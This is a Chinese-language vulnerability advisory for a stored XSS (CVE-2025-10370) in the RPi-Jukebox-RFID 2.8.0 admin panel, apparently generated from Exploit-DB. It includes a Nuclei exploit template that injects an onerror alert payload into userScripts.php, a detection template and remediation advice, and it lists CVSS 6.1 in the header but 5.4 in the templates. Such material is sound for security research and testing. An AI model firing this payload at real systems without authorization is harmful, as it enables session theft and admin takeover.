登录
漏洞分析

[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

AiRedTeam

阅读时间 2 分钟
分享
CVE-2025-10370

RPi-Jukebox-RFID 2.8.0 存在存储型XSS漏洞,通过管理面板提交恶意脚本到配置文件实现持久化攻击。

Medium · CVSS 6.1

📋 漏洞基础信息

CVECVE-2025-10370
漏洞类型存储型跨站脚本(XSS)
受影响版本RPi-Jukebox-RFID 2.8.0
危害等级Medium · CVSS 6.1
发布日期2026-02-02
提交者Beatriz Fresno Naumova
来源Exploit-DB 原文 ↗

🔬 漏洞根因

管理面板的配置文件编辑功能未对用户输入进行充分过滤和转义,允许注入任意JavaScript代码,导致存储型XSS。

🎯 攻击场景

1. 攻击者以管理员身份登录RPi-Jukebox-RFID管理界面;2. 在配置文件中插入恶意JavaScript payload并保存;3. 当其他管理员或用户查看该配置页面时,payload自动执行。

💥 漏洞影响

攻击者可在受害者浏览器中执行任意JavaScript,窃取会话cookie、重定向到钓鱼页面或篡改页面内容,可能导致管理员账户被接管。

⚔️ Nuclei Exploit 模板

以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:

id: CVE-2025-10370-exploit

info:
  name: RPi-Jukebox-RFID 2.8.0 Stored XSS Exploit
  author: exploit-db-to-nuclei
  severity: medium
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2025-10370
    cwe-id: CWE-79

variables:
  payload: '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

http:
  - method: POST
    path:
      - "{{BaseURL}}/phoniebox/htdocs/userScripts.php"

    headers:
      User-Agent: "Mozilla/5.0"
      Content-Type: "application/x-www-form-urlencoded"
      Referer: "{{BaseURL}}/phoniebox/htdocs/userScripts.php"

    body: "customScript={{url_encode(payload)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{payload}}"
        condition: or

      - type: status
        status:
          - 200

🔍 Nuclei Detection 模板

以下为漏洞探测模板,用于判断目标是否受影响:

id: CVE-2025-10370-detection

info:
  name: RPi-Jukebox-RFID 2.8.0 Stored XSS Detection
  author: exploit-db-to-nuclei
  severity: medium
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2025-10370
    cwe-id: CWE-79

http:
  - method: GET
    path:
      - "{{BaseURL}}/phoniebox/htdocs/userScripts.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "RPi-Jukebox-RFID"
          - "userScripts"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'RPi-Jukebox-RFID v([0-9]+\.[0-9]+\.[0-9]+)'
        group: 1

🛡️ 修复建议

升级到RPi-Jukebox-RFID最新版本;在管理面板配置编辑功能中实施输入验证和输出编码。临时缓解措施:限制管理面板访问IP范围。

📎 参考链接

⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:14 | 来源: Exploit-DB

[!] CONTACT_CHANNELS

如需商务合作、技术咨询或漏洞反馈,请通过以下离岸节点联系作者。

> PING_AUTHOR (@A1RedTeam)